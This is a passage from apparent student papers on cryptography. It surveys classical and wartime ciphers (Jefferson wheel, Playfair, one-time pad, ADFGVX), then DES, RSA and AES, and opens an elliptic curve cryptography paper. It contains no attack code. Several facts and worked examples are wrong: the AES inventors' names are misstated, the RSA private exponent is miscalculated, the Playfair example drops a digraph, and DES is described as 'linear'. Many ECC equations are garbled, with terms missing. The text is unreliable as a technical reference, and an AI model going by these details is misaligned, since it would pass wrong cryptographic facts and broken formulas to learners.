Different wheel orders will result in varying ciphers. As the order gets formulated, the user can navigate the rows (ie. up and down) until the entire message is fully formed. For instance, to encrypt the sentence, “You are beautiful,” the letter “y” is placed on the outermost left wheel. The next wheel is rotated until the letter “o” is next to “y”. The third wheel is rotated until “u” is next to “o”. This is performed until all the letters in the messages are spelled out into 26 letters with no spaces and punctuation marks in between. The remaining rows of letters stand for either the different cipher-texts derived or simply the plaintext message. The user would have to copy the row of cipher-texts letters, with the exception of the row containing the original text message, and send them to the recipient. Upon receiving the discs, the recipients will have to arrange the discs in accordance to the spelling of the cipher-text and identify the plaintext message situated rows apart from the cipher-text. It would be highly unlikely that both the cipher and plaintext message are readable and make sense in the English language as such a scenario can be impeded by the coder/sender. Usually, only the plaintext message is identifiable and readable so that the recipient can spot the plaintext message easily. For messages containing more than 26 letters, users will have to repeat the entire process until the entire message is formed in order to obtain the entire cipher-text letters. If the message to be encrypted is short and the order of letters and the wheels are unknown, the Jefferson’s Wheel Cipher would be reasonably secure against modern code-cracking techniques. The same applies to the encryption of more than one row of text with disks of the same order. If the length of the message increases substantially, one would need to use the letter frequencies of the English language to source for patterns and decipher the message. One of the limitations of this cipher system is that, the user would have to send copies of the cipher system beforehand to his/her recipients. During ancient civilization, this physical course of action would be extremely time-consuming as it would take months to fulfill. By then, the message to be transmitted would become useless and inaccurate. 21 4 War Cryptography In this segment, we will be exploring three cryptography techniques and its features, specifically the Playfair cipher, One Time Pad and ADFGVX cipher. 4.1 Playfair Cipher (http://www.freedom316.com/cryptografreaks/playfair.php) The Playfair cipher is the earliest digraph substitution cipher. It encrypts pair of letters instead of each letter per encryption as illustrated in the Caesar cipher. It uses a table whereby 25 letters within the English alphabet are arranged in a 5x5 tabular form. Typically, “J” is removed from the table and its adjacent letter, “I”, will substitute it when needed to encode a plaintext message. The Playfair cipher was known to be more secure than the above mentioned ciphers because it cannot be deciphered using the frequency analysis method, which is normally used for single substitution cipher. To identify a Playfair cipher, one would need to note that there are no double letter digraphs within the cipher text, and the length of the message is reasonably long enough. In 1854, this manual symmetric cipher was first introduced by a scientist, Charles Wheatstone. During then, he was put in charge of building up on the electric telegraph system in England. In addition, he was also sourcing for a method to communicate securely with his friends. Thus, he came up with the Playfair cipher which can be encoded and solved manually, and also, no other bulky or pricy equipments are needed. However, the name “Playfair” was derived upon from Lord Lyon Playfair, a renowned friend of Charles Wheatsone, who strongly supported and promoted the cipher to be used within the British Army. As a result, it was used by the British Army in World War I and the Australians in World War II to conceal significant, albeit non-crucial communications and secrets against their enemies during the warfare. If the enemies were to get hold of the concealed messages, they would not be able to decode the messages promptly due to the increased difficulty in breaking the cipher. Even if they could decode the message in the end, the message will not be useful, timely and accurate anymore. During the encoding of plaintext messages, the sender would need to break the text messages into groups consisting of two letters and place them within a table. Two letters within a digraph are supposed to be located at opposite ends within the key table. The following rules need to be adhered to during encoding. Firstly, when there exist both letters within a digraph, the second repeated letter will be substituted by “X”. Secondly, if letters within the same digraph are located within the same row, substitute them with their respective letters located on their right directly. Thirdly, if letters within the same digraph are located within the same column, substitute them with their respective letters directly below them. Lastly, if the letters are not located within the same row or column, replace them with the respective letters located on the same row albeit, at the other end of the rectangle grid. 22 The sender would have to ensure the order because the first letter of the encrypted pair should be positioned in the same row as the first letter of the plaintext pair. Moreover, the plaintext message would require having even number of letters. If it contains an odd number of letters, the last letter would need to be paired up with “X”. For instance in the plaintext message, “HELLO EVERYBODY”, whereby there is repeated letters in the group “LL” and it contains odd number of letters, the plaintext message will be grouped as, “HE LX LO EV ER YB OD YX”. Subsequently, the sender would need to observe the letter pairs and their positions within the grid. If “playfair example” is used as the key, Figure 2 (Refer to Appendix A) would be the table grid. If the plaintext message is, “Hide the golds”, upon breaking up into groups of 2 letters, it will look like the digraph letters in Table 4 (Refer to Appendix A). The pair “HI” is not located either in the same row or column, thus the sender can replace it with letters on each opposite side. As a result, “HI” will become in “BM”. The second pair “DE” is located within the same column. The sender can replace the digraph pair with the respective letters directly below each letter. As a result, “DE” will become “OD”. The third pair “TH” is not located either in the same row or column. The sender can replace it with letters on each opposite side. As a result, “TH” will become “ZB”. Similarly upon applying the same rule, the fourth pair will be replaced by “XD” and the fifth pair will be replaced by “HO”. In summary, “HI DE TH EG OL DS” will become, “BM OD ZB XD HO”. In order to decipher, if letters within the same cipher-text digraph are located within the same row, substitute the letter with the one directly on the left. If letters within the same cipher-text digraph are located within the same column, substitute with the one directly on top. The Playfair cipher can still be broken if there are sufficient amount of text. If solely the cipher-text is known without the key and the plaintext message, brute force method can be used on the cipher to determine frequency occurrence of the digraphs. Frequency analysis can still be used to break the cipher only if there are approximately 600 digraphs instead of solely 26 monographs. The frequency analysis technique will only be applicable for implementation if there are more cipher-texts to work on. Another way to decipher the Playfair cipher is to observe its digraph carefully to determine if there exists any reverse letters within a cipher-text. For instance, the letter pair “AB” “BA” will be decrypted and result with same letter pairs in their plaintext, “RE” and ER”. Words like “Receiver” or “Departed” both start and end with same letter pairs. In such a scenario, one would need to identify and match the reverse letter pairs to come up with a list of words starting and ending with the letters “RE” and “ER” respectively before determining the correct plaintext in order to source for the key. To make the encryption more secure, The German Army, Air Force and Police utilized the Double Playfair encryption technique during World War II. However, the decryption technique used to decode the Double Playfair encryption was not a definite secret and fool proof method too. 23 4.2 One Time Pad (http://www.freedom316.com/cryptografreaks/onetimepad.php) The One Time Pad is a cryptography system, also often referred to as either the Vernam cipher or the perfect cipher. It is the sole cryptography technique whereby it is mathematically unbreakable if it is used correctly. It is often used for diplomatic and military warfare purposes among intelligence agencies to ensure the confidentiality of messages transmitted. It has been utilized ever since the Cold War period and mainly during World War II. The One Time Pad is known to be the only cryptography system which provides bona-fide message security in the long run. In order for the One Time Pad to be unbreakable and secure, the following rules stated in the Table 5, (Refer to Appendix A), need to be abided by the message sender.. In 1882, Californian banker Frank Miller invented the One Time Pad and published it in his self-written codebook entitled, “Telegraphic Code to Insure Privacy and Secrecy in the Transmission of Telegrams”. In 1917, Gilbert Vernam, a research engineer at AT&T came up with an automated electro-mechanical system to encrypt messages transmitted via teletypewriter communications. The One-time Tape invented was a polyalphabetic cipher, using non-repeating random sequence of characters. In 1920, AT&T promoted the Vernam system, while also highlighting its secure communication function but the response garnered was unsatisfactory. Instead, the one-time tapes were used by headquarters or communication centres. The machine was marketed to the government for usage during World War I but it was not put on sale till 1920 in the commercial market. It was extensively put to use only during World War II. When a random key is applied on a plaintext, the cipher-text derived is also known to be random. With the cipher-text, the third party or unintended message recipient cannot solve the mathematical algorithm because he has no clue of both the key and the plaintext. In addition, since each digit or letter within the key is random, the unintended recipient is unable to observe a mathematical link between each ciphertext characters. The modulo 10 (one time pad digits) or modulo 26 (one time pad letters) is used to ensure that the cipher-texts do not disclose either the key or the plaintext message. Even with infinite computational power to source through all possible keys, an adversary would still be unable to obtain the correct key. Thus, the one-time pad is verified to be completely secure. The absolute, random key is crucial in enabling the one time pad to be mathematically unbreakable. Besides being random, the key cannot be used more than once, if not the key can be made known via simple cryptanalysis. This is mainly because by using the same key for more than once, the link between the two ciphertexts produced and keys will be made known. The cipher-text messages produced are not randomized and the plain-text messages can be discovered via heuristic analysis. Known-plaintext attacks can occur and the key will be made known. With that, there is a risk for the adversary to find out about the contents of all the encrypted messages belonging to the same key. Conversely, the one-time pad lack message authentication. If the XOR method applied to the key and plaintext is known to the adversary, he can tarnish the integrity 24 of the message by modifying the message with another message of the same length without accessing the one-time pad directly. There have been methods to prevent such a malicious occurrence within the one-time pad system via the use of message authentication code and universal hashing of messages to uphold message integrity. 4.3 ADFGVX cipher (http://www.freedom316.com/cryptografreaks/adfgvx.php) The ADFGVX cipher is a fractionating transposition cipher. It was derived upon from the ADFGX cipher, an earlier yet similar cipher invented by Colonel Fritz Nebel in 1918. The letter “V” was added to the name so that the entire alphabet can be positioned in the 6x6 Polybius square. Hence, substituting the use of “J” with “I” will not be performed anymore. The individual letters “ADFGX” are extremely different when converted into Morse code. Thus, the name of the cipher, “ADFGVX” was chosen to minimize any error during encoding and transmission activities. The ADFGVX cipher was introduced and utilized by the German Army in World War I to conceal communications made against unintended recipients. This cipher uses a key – a 6x6 Polybius square grid which contains 26 letters in the entire English alphabet and digits from 0 to 9 as shown in Figure 3 (Refer to Appendix A). All the columns and rows in the grid are occupied by either a letter or digit and they are arranged randomly via permutation. Firstly during encryption, each character of the plaintext is substituted with corresponding labels of the respective row and column in the key. Following that, the text undergoes fractionating and columnar transposition. A few columns are chosen and the cipher-text is printed row by row, having each character within a column. The columns would then be re-ordered via permutation such that the assignment of the length of the keyword is equivalent to the number of columns before arranging them in alphabetical order in accordance to the labelling of the keyword. Lastly, the cipher-text can be derived from printing out the columns in the correct order. For example, the plaintext message, “Attack at 1800” will result in the following cipher-text, “DF DG DG DF AD GG DF DG DX XF PG PG”. By re-ordering the columns via permutation, the following cipher-text will result in Figure 4 (Refer to Appendix A). Lastly, via fractionating and columnar transposition, the resultant cipher-text is illustrated in Figure 5 (Refer to Appendix A). Shortly within the same year, the cipher was broken with the use of complex algorithms by Georges Painvin, a French Army Lieutenant. In today’s context, the ADFGVX cipher is deemed to be relatively insecure because it can be cryptanalysed, especially if the length of the keyword is known, and the unintended recipient is able to rearrange rows into their correct order. Together with the brute force and trial-anderror techniques, the recipient might be able to decode the cipher. However, to enhance the security of the cipher, the sender can apply other ciphers on the plaintext message so that the level of difficulty in decoding the cipher will increase significantly. 25 5.0 Modern Cryptography In this segment, we will be exploring cryptography techniques and their respective features used in the modern context, specifically the DES, RSA and the AES. 5.1 Data Encryption Standard (DES) (http://www.freedom316.com/cryptografreaks/des.php) The DES is a block cipher, using shared secret encryption among intended parties. It was invented by the National Bureau of Standards, with the help of the National Security Agency in the 1970s. The implementation of DES was aimed at offering a standard scheme in protecting and concealing sensitive, commercial information and unclassified government applications against unintended parties. The initial draft was created by IBM and it was named as the “Lucifer”. In 1976, after much redesigning and modification, the DES officially became a federal standard. From then on, the DES has been extensively adopted and published as a standard worldwide. There has been a public debate over the design and selection of the 56-bit key. However, recent analysis has illustrated that the selection was appropriate and the DES was indeed well-designed. [14 in Appendix B] In Figure 6 (Refer to Appendix A), the key determines the mechanism of the process. By applying these operations repetitively in a continuous mode, the DES will obtain a result of approximate randomness and without the key. Any unintended recipients will not be able to obtain the original plaintext message. The fundamental procedure of encoding a 64-bit plaintext data block each time within a DES goes through the iteration 16 times. Initially, it goes through an initial permutation. Initially, there is a 64-bit key but 8 bits will be used for parity checking purposes. Thus, every 8th bit of the key will be discarded upon checking. Inside each iteration, 48-bits from the 56-bit key enter the complex key dependent function. The function is the crux of security within the entire DES and it contains numerous varying transformation and non-linear substitution to ensure that the cipher would be linear and unbreakable. After going through both the XOR and key dependent function, a final permutation, which is the inverse of the initial permutation function, will be performed on the output. The ultimate output of the DES is a cipher-text which has the same bit-string length as the original plaintext message input. At the start of each iteration, the 64-bit plaintext message block is halved, with the right 32-bits block undergoing the Feistal structure before being XOR-ed with its left 32-bits block. In the last iteration, it exchanges position with the left 32-bits block. There are two essential cryptography techniques within the DES, namely confusion and diffusion. At the most initial stage, diffusion is performed through several permutations while confusion is performed via the XOR function. Within the Feistal structure, 32 bits undergo through it each time and it consists of four phases. Firstly, during expansion, the 32 bit block is lengthened to 48 bits via the expansion permutation function by duplicating half of the initial 32 bits. The output of the function contains eight 6-bit blocks, each block consisting of a copy of 4 corresponding input bits and the adjacent bit from its respective input bits on both sides. Secondly, during the key mixing phase, the output of the expansion phase is 26 added to the sub-key via an XOR operation. Sixteen 48-bit sub-keys are derived from each round of the key mixing phase and is obtained from the main key. Thirdly, after the key mixing phase, the block is divided into eight 6-bit pieces and undergoes through processing in the substitution boxes. Each of the eight S-boxes swaps six input bits with four output bits via non-linear transformation with the help of the lookup table. Lastly, in the permutation phase, the output from each of the eight Sboxes is concatenated to produce a 32-bit output and this output is permutated within the P-box. Since the P-box conducts straight permutation operations, the resultant output will undergo the XOR operation with the left 32-bit block input at the start of each round. With the exception of the final round, the left and right 32-bit halves are interchanged and it goes through the Feistal structure again. Since DES utilizes a key to operate its encryption mechanism, only those who are aware of the particular key used can decrypt the cipher-text. However, the DES is not secure at all. Since the 56-bit key in the DES is extremely short, it is susceptible to brute-force decryption techniques via searches for the key space with the use of machines and specialized hardware. In 1998, the Electronic Frontier Foundation developed a DES-cracking machine and thus, was able to locate a DES key within a couple of days. Any corporation, government agency or malicious organization could easily purchase such a machine to decipher a DES cipher-text. However, another encryption technique, Triple DES, has enhanced security characteristics because DES is applied thrice using three different keys. It is much secure because a brute force key search attempt will be made impossible. The minor disadvantage of Triple DES is that it functions at approximately 0.66% of the speed of DES but modern CPUs are able to run it at a decently. 5.2 Ron Shamir Adlemen (RSA) (http://www.freedom316.com/cryptografreaks/rsa.php) The RSA encryption system uses a public key cryptography technique to provide and maintain privacy, confidentiality and authenticity of digital data. Examples of such uses include those in electronic commerce protocols, web servers and browsers which elicit web traffic, electronic communications such as e-mails, remote logging-in sessions and credit card payment verification systems. [16 in Appendix B] RSA was invented by Ron Rivest, Adi Shamir, and Len Adlemen and their first publication about RSA was made in August 1977 in the Scientific American journal. The name, RSA, represents the initials of the three inventors’ surnames and they are positioned in accordance to the order which was listed in the paper published. Following that in 1978, the RSA algorithm was made available in print in the Communications of the ACM. With regards to the RSA algorithm, generating prime numbers are indeed very crucial. This is mainly because the security of RSA public key encryption technique depends largely on the computational difficulty of finding the complete factorization of a large composite integer whose prime factors are unknown. The RSA algorithm consists of four steps, namely creation of public key, encryption of messages, creation of private key, and decryption of messages. The 27 public key will be made known to everyone and will be used to encrypt messages while the private key is only used for decrypting messages. During the creation of a public key, the sender would have to choose two large prime numbers P and Q. For example the sender chooses the following values, P = 23 and Q = 41. Upon substituting the value of P and Q into equation 1 (Refer to Appendix A), X = 880. Since E is relative prime to X, E can be equivalent to 879. Similarly in equation 2 (Refer to Appendix A), N = 943. With the value of the public key to be known as the value of N being concatenated with the value of E, the sender is able to encrypt the message. As shown, the message equals to the value of m which is 35. In order to encode and send the message to the recipient, the sender would have to calculate the value of C in equation 3 (Refer to Appendix A). Upon substituting the values of m, E and N, C = 545. The value of C is the encoded message which the sender will send to the message recipient. In order to decipher the encoded message, the recipient will have to work out the multiplicative inverse of equation 4 (Refer to Appendix A) in order to find the value of D. Upon substituting the relevant values, D = 503. The value of the private key used will be the value of N being concatenated with the value of D. In order to decode the message, the recipient must calculate the value of m in equation 5 (Refer to Appendix A). By substituting equation (3) into equation (5), equation (6) (Refer to Appendix A) will result as the following. Based on equation 6, in order to calculate the value of the message transmitted, the intended recipient would have to know the value of D and E. In the above example, both the values of P and Q are relatively small and perhaps, by brute force mathematical methods, the message can still be made known if the unintended recipient is able to solve equation (1) upon finding the value of x and E. If the values of P and Q become very much larger, any unintended recipient will not be able to compute the value of D and E via brute force methods because it would be very much tedious and computationally infeasible to find the complete factorization of large composite integers whose prime factors are unknown. As a result, the RSA algorithm is reasonably secure if both the values of and P and Q are large and hence, messages being encrypted can continue to maintain its confidentiality and integrity. Due to the fact that the RSA algorithm is a deterministic encryption technique, a malicious, unintended recipient of a message can conduct a chosen plaintext attack by encrypting similar plaintext messages using the known public key to check if the encrypted messages are equal to the cipher-texts upon comparison. RSA cryptography system without padding is not semantically secure as such recipients are able to distinguish two encrypted messages apart from each other. Thus, in order to prevent the occurrences of such attacks, RSA implementation in reality generally input a structured, randomized padding into the message before encryption. This ensures that the padded message will be encrypted to form different possible cipher-texts even if the padded messages were identical. 28 The largest number which was factored by a factoring algorithm in recent years was 768 bits long. Since the length of RSA keys are generally 1024 to 2048 bits long, it is still unbreakable in today’s context. With regards to the authentication of the message, the sender can make use of RSA to digitally sign a message. If the sender wants to sign on a digital message before sending it to the intended recipient, he/she can use his/her private key to create a digital signature. The sender would have to create a hash message and append her digital signature to it. Upon receiving the digitally signed message, the intended recipient will have to use an identical hash algorithm to encrypt the message. The recipient will have to encrypt the signature and the message and compare the hash value with the message’s actual hash value. If both hashes are the same, the recipient will be absolutely certain that it was the sender’s private key who digitally signed the message and the message has retained its integrity. Digital signature schemes like the RSA-PSS (Probabilistic Signature Scheme) will be required for the use of creating digital signatures during message encryption so as to enhance security assurance. In addition, the sender would also need to note that the same key should not be used for both encryption and creation of digital signatures. 5.3 Advanced Encryption Standard (AES) (http://www.freedom316.com/cryptografreaks/aes.php) The AES is an iterative, symmetric block cipher which is used to encrypt and decrypt electronic data using the same key. Upon encryption, its output has the same number of bits as compared to the original plaintext message. The AES utilizes keys of 128, 192 and 256 bits to encrypt and decrypt data in blocks of 128 bits. [13] It also uses a loop structure to conduct permutation and substitution on the input plaintext repeatedly. Within AES, there is no Feistel structure. Instead, it utilizes the substitution permutation network. In 2001, the AES algorithm was introduced by the National Institute for Standards and Technology to ensure the confidentiality of top secret information. The AES was initially named the Rijndael and was originally invented by two Belgian cryptographers, Joan Daemon and Vincent Rijndael. Due to the extremely short key in the DES, many malicious attacks via sophisticated hardware and software have effectively decrypted data which were encrypted by the DES system. Since DES lacks the fundamental security features, the AES was introduced to overtake the existence of the DES as a Federal Standard in 2002 by the Secretary of Commerce. Common usages pertaining to the AES include file encryption on hard disk or thumb drive and encryption of electronic mail messages. As seen in Figure 7(Refer to Appendix A), within the AES algorithm, during key expansion, round keys are obtained from the cipher key based on the Rijndael’s key schedule. In the first round, each byte of state undergoes bitwise XOR with the round key. In the subsequent nine rounds, during the SubByte step, each byte within the matrix is updated in accordance to the 8-bit Rijndael Substitution box look-up table. This step offers non-linearity in the cipher via multiplicative inverse over a finite 29 field. In the ShiftRow step, the first row remains as it is. Each byte starting from the second row is shifted one position to the left, while the third row is shifted two positions to the left and so on. In the MixColumn step, four bytes belonging to each column of state are combined via an invertible linear transformation. The function operates on the four byte input and the resultant is also, a four byte output. Each column is also multiplied against a matrix made up of the 128-bit key. In the XORnthRoundKey step, upon getting the sub-key from the main key via the Rijndael’s key schedule, each byte of the sub-key is combined with each byte of the state during the bitwise XOR operation. In the final round, all steps are repeated except the MixColumn step before obtaining an encrypted output. In order to obtain the plaintext input from the encrypted output, a reverse of the above rounds are required to be carried out with the use of the same encryption key. In 2009, there were publications pertaining to attacks against the AES cryptography system. However, the National Security Agency stated that the AES was still capable of securing non-classified data belonging to the US government. This is mainly because the published attacks in theory are a related key attack whereby the adversary would need to gain access to plaintexts that are encrypted with multiple, related keys. In addition, with regards to the AES-256, it has 14 rounds. The published attack had broken only 11 rounds. At this current moment, the theoretical attack is still beyond computational feasibility. 30 6 Conclusion Throughout the years since ancient times, people have been inventing cryptographic systems to conceal messages used for communication purposes from their unintended recipients. Having studied the various cryptographic systems above, we have learnt that most cryptographic systems have its limitations. Even with such limitations, cryptography activities have been widely adopted by people, for military usages in the ancient era to commercial purposes in today’s context. As newer and more complicated cryptography techniques are being developed, the probability of cracking a cipher have also become more difficult and thus, people are able to further ensure message confidentiality while also, being more competent in deterring malicious attacks by third party adversaries. 7 References (Refer to Appendix B for more references) 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. Logical Security, http://www.logicalsecurity.com/resources/whitepapers/Cryptography.pdf Redline, http://www.freewebs.com/atbash_cipher/atbshhistory.htm Redline, http://redline.webamphibian.com/crypt/jefferson.asp Cipher Machines http://ciphermachines.com/ciphermachines/jefferson.html Britannica Encyclopedia, http://www.britannica.com/EBchecked/topic/628637/Vigenère-cipher Jeremy Norman’s From Cave Painting to the Internet http://www.historyofinformation.com/index.php?id=2011 Vanderblit University, http://blogs.vanderbilt.edu/mlascrypto/blog/wpcontent/uploads/project-playfair-cipher.pdf Shifted Bits Blog, http://www.shiftedbits.net/code/the-adfgvx-cipher/ Cipher Machines & Cryptography, http://users.telenet.be/d.rijmenants/en/onetimepad.htm Next Wave Software, http://www.thenextwave.com/page19.html Linux Free S/Wan, http://www.freeswan.org/freeswan_trees/freeswan1.5/doc/DES.html EKU, http://people.eku.edu/styere/Encrypt/RSAdemo.html Federal Information Processing Standards Publication 197, http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf MSDN Magazine, http://msdn.microsoft.com/enus/magazine/cc164055.aspx Business Security, http://bizsecurity.about.com/od/informationsecurity/a/aes_history.htm Schneier on Security, http://www.schneier.com/blog/archives/2009/07/another_new_aes.html 31 32 H!Appendix A Tables Table 1. Atbash Cipher of the Roman alphabet Plaintext Cipher-text A Z B Y C X D W E V F U G T H S I R J Q Table 2. Caesar cipher of the Roman alphabet, shift of 3 Plaintext Cipher-text A D B E C F D G E H F I G J H K I L J M Table 3. Vigenere cipher example Plaintext Key Cipher H H O E E I L Y J L H S O E S Table 4. Playfair cipher digraph example HI DE TH EG OL DS Table 5. Rules of a One Time Pad (http://users.telenet.be/d.rijmenants/en/onetimepad.htm) 1. The length of the key is equivalent to the message to be encrypted. 2. The key is random. 3. Both the key and plaintext are calculated modulo 10 (digits), modulo 26 (letters) or modulo 2 (binary) 4. Each key can only be used once. After each use, both the sender and recipient must destroy their key. 5. There should only be a key each for the sender and recipient 33 Figures Fig 1. Vigenere Table Fig 2. Playfair cipher key table 34 Fig 3. ADFGVX cipher key Fig 4. ADFGVX cipher-text Fig 5. ADFGVX resultant cipher-text 35 Fig 6. DES block diagram Fig 7. Summary of AES Encryption 36 Formulas X = (P-1) (Q-1). (1) N = P*Q. (2) c = mEmod N (3) D*E mod x = 1 (4) m = cD mod N (5) cD mod N = mED mod N (6) 37 Appendix B References 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. Student Pulse, http://www.studentpulse.com/articles/41/a-brief-history-ofcryptography Gary Kessler Associates, http://www.garykessler.net/library/crypto.html Cornell Mathematics, http://www.math.cornell.edu/~kozdron/Teaching/Cornell/135Summer06/Handouts/L ecture2.pdf Oracle Thinkquest: Library http://library.thinkquest.org/28005/flashed/timemachine/courseofhistory/jefferson.sht ml Crypto Museum, http://www.cryptomuseum.com/crypto/usa/jefferson/index.htm#ref Discovering Lewis & Clerk, http://lewis-clark.org/content/contentarticle.asp?ArticleID=2224 Rumkin,com, http://rumkin.com/tools/cipher/playfair.php Practical Cryptography, http://practicalcryptography.com/ciphers/playfair-cipher/ Practical Cryptography, http://practicalcryptography.com/ciphers/adfgvx-cipher/ RuffNekk’s Crypto Pages, http://ruffnekk.stormloader.com/adfgvx_info.html University of Cambridge, http://www.srcf.ucam.org/~bgr25/cipher/adfgvx.php Marcus J. Ranum, http://www.ranum.com/security/computer_security/papers/otp-faq/ Universiteit van Amsterdam, http://www.maurits.vdschee.nl/otp/ Books by William Stallings, http://williamstallings.com/Extras/SecurityNotes/lectures/blockA.html University of Wisconsin Madison, http://pages.cs.wisc.edu/~rist/papers/detenc-rel.pdf Applied Crypto Group, http://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf RSA Encryption – Tom Davis, http://www.geometer.org/mathcircles/RSA.pdf RSA Public-Key Cryptography, http://www.efgh.com/software/rsa.htm Schneier on Security, http://www.schneier.com/blog/archives/2009/07/new_attack_on_a.html 38 Elliptic Curve Cryptography Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan National University of Singapore (NUS), School of Computing, CS3235: Computer Security Abstract. This paper gives an overview of the Elliptic Curve Cryptography (ECC) and how it is used to implement digital signature using Elliptic Curve Digital Signature Algorithm (ECDSA) and key agreement protocols using Elliptic Curve Diffie-Hellman (ECDH). There is discussion on the mathematical components of an elliptic curve function and underlying theories of ECC. It also gives a general description of the security issues of ECC as well as some ECC implementation examples. 1 Introduction Elliptic Curve Cryptography (ECC) is a public key cryptography method based on elliptic curves over a finite field. There are two main uses of public key cryptography: public key encryption and digital signatures. Public key encryption involves sending a message encrypted with the recipient‟s public key, which can only be decrypted with the recipient‟s private key to prove confidentiality. Digital signature on the other hand, is used to prove authenticity of the sender; a message encrypted with the sender‟s private key will be sent to the recipient, who will decrypt the message with the sender‟s matching public key to prove that the sender had access to the associated private key. Such public key cryptography is assumed to be secured due to the difficulty in factorization of a large integer made up of two large prime factors, the larger the key length, the more secure it is. ECC is able to provide a similar level and type of security with much smaller key lengths due to the difficulty of solving the ECC discrete logarithm problems; finding the solution of k where k = and P and Q are points on the elliptic curve E defined over a finite field. Hence, with short key length, handshaking protocols used between sender and recipient where public key cryptography is implemented will be faster. 39 2 Mathematical Knowledge for ECC 2.1 Elliptic Curve Function Elliptic curves are formed by quadratic curves to become cubic. An elliptic curve E, over a field F, can be described by the equation = + a + b, where a, b F. Elliptic curve cryptography is defined over the elliptic curve = + a + b, where the discriminant of the equation, 4 + 27 must not be equal to 0. This condition must be satisfied such that the elliptic curve possesses 3 distinct roots. If the discriminant=0, there will be 2 or more roots coalescing, producing curves that are singular. Singular curves are not desirable for cryptography because it is easy to crack. Another characteristic of the elliptic curve is that the curve is symmetric about x axis, which can be observed by rewriting the equation = . Every individual values „a‟ and „b‟ of the equation gives a different elliptic curve and all points (x,y) of the equation lies on the curve with an infinite point. For instance, implementation of ECC on public key cryptography results in a public key that is a point on the curve and a private key that is a number randomly generated. The public key can be obtained by multiplying the private key with a generator point G on the curve. This generator G, values „a‟ and „b‟ within the field F, and other constants form the domain parameters of ECC, which will be further elaborated under „Elliptic Curve Domain Parameters for different finite fields‟ of this paper. 2.2 Point Addition Before going into point multiplication which is necessary for generating the keys, point addition is required as it is part of point multiplication. Point addition is basically the adding of 2 points J and K on an elliptic curve so to obtain another point L on the same elliptic curve. 40 Fig. 1. The graph above demonstrates a line intersecting J, K and –L if J ≠ K for point addition. The elliptic curve has 2 properties, and the first is if a line intersects 2 points, it will intersect a 3rd point. Fig. 1 above shows that if J ≠ K and a line is drawn through both of the points J and K, it will intersect the point –L on the same elliptic curve. After that, reflect –L with respect to the x-axis in order to get L. This gives the equation of L = J + K on an elliptic curve. Fig. 2. The graph above demonstrates a line intersecting J, K and ∞ if J = -K for point addition and if the line is a vertical line. If J = -K, the line that intersects both J and K would also intersect the point ∞ since all vertical lines intersect the curve at point ∞. The curve has an increasing slope after an inflection point and it will eventually become infinite and intersect ∞ as well. Therefore, J + (-J) = ∞ and ∞ is the identity for point addition. Hence J + (-J) = O. This is shown in figure (b). O is the additive identity of the elliptic curve group. To find the point of L, we have to first find the line intersecting J, K and –L. Let J = (xJ, yJ), K = (xK, yK) and L = (xL, yL). Let the slope of the line be s and the equation to find the slope will be s = (yJ – yK) / (xJ – xK). To find xL and yL, the following equation can be used: 1. 2. xL = s2 – xJ – xK yL = -yJ + s(xJ – xL) 41 However, if J = -K i.e. K = (xJ, -yJ) then J + K = O. where O is the point at infinity. The second property is if a line is tangent to the elliptic curve, it will intersect another point on the same elliptic curve. This will be further elaborated at the next section. 2.3 Point Doubling on real numbers, Prime field, Binary field and also in Projective Coordinate System Fig. 3. The graph above demonstrates a line tangent at the point J and intersecting -L if J = K for point doubling The second property is if a line is tangent to the elliptic curve, it will intersect another point on the same elliptic curve. Fig. 3 above shows that if J = K and a line is drawn tangent to the point J, it will intersect the point –L on the same elliptic curve. Similarly, reflect –L with respect to the x-axis in order to get L. This will give the equation of L = 2J on an elliptic curve. 42 Fig. 4. The graph above demonstrates a line tangent at the point J and intersecting -∞ if yJ = 0 for point doubling and if the line is a vertical line However, if the y-coordinate of point J is at zero, then the tangent to this point will intersect ∞. This results in 2J = ∞ when if the y-coordinate of point J is at zero. To find the point of L, we have to first find the line tangent to J and intersecting –L. Let J = (xJ, yJ), K = (xK, yK) and L = (xL, yL). Let s be the tangent at the point J and a be one of the parameters chosen with the elliptic curve. The equation to find the line will be s = (3xJ2 + a) / (2yJ) To find xL and yL, the following equation can be used: 1. 2. xL = S2 – 2xJ yL = -yJ + S(xJ – xL) Both point addition and point doubling are necessary operations for point multiplication. Although the graph for elliptic curve on a Prime field is not a smooth curve, the rules for point doubling can still be adapted for such graph. As the elements of the Prime field are integers between 0 and P – 1, the equation of the graph for the elliptic curve on a prime field will be y2 mod P = x3 + ax + b mod P where 4a3 + 27b2 mod P ≠ 0. In elliptic curve cryptography, the prime number P will be chosen in such a way that there will be many points on the elliptic curve in order to make the encryption stronger. Since the rules for point doubling can be adapted to elliptic curve on a Prime field, the equations will be the following: 43 1. 2. 3. S = (3xJ2 + a) / (2yJ) mod P xL = S2 – 2xJ mod P yL = -yJ + S(xJ – xL) mod P Similarly for Binary field, despite having different equation and elements, the rules for point doubling can be adapted to the graph of elliptic curve on a Binary field. The equation of the graph for elliptic curve on a Binary field is as follows: y2 + xy = x3 + ax2 + b where b ≠ 0. Since the rules for point doubling can be adapted to elliptic curve on a Binary field, the equations will be the following: 1. 2. 3. S = xJ + (yJ / xJ) xL = S2 + S + a yL = xJ2 + xL(S + 1) For projective coordinate system, the need of multiplicative inverse operation in point addition and doubling can be eliminated. This improves the efficiency of point multiplication operation by reducing the process of converting a given point in affine coordinate to projective coordinate before point multiplication then converting it back to affine coordinate after point multiplication to only one multiplicative inverse operation. The operation in projective coordinate will involves more scalar multiplication than in affine coordinate. However, ECCon project coordinate will only be efficient when the multiplicative inverse operation is slower than the implementation of scalar multiplication. Despite having a different equation of the graph for elliptic curve in projective coordinate and point (X, Y, Z) in projective coordinate, the point doubling formula of L = 2J is still similar to doubling a point in project coordinate. As a note, point (X, Y, Z) in projective coordinate corresponds to the point (X/Z, Y/Z 2) in affine coordinate. The equation of the graph for elliptic curve in project coordinate is Y 2 + XYZ = X3Z + aX2Z2 + bZ4. Let (X3, Y3, Z3) = 2(X1, Y1, Z1) 1. 2. 3. 4. 5. Z3 = X12. Z12 X3 = X 1 4 + bZ14 Y3 = bZ1 4Z3 + X3(a. Z3 + Y12 + b.Z14) 2.4 Point Multiplication The main cryptographic operation in ECC is point multiplication which computes Q = kP as mentioned earlier. The point P which is on the elliptic curve is multiplied by an integer k resulting in another point Q on the same 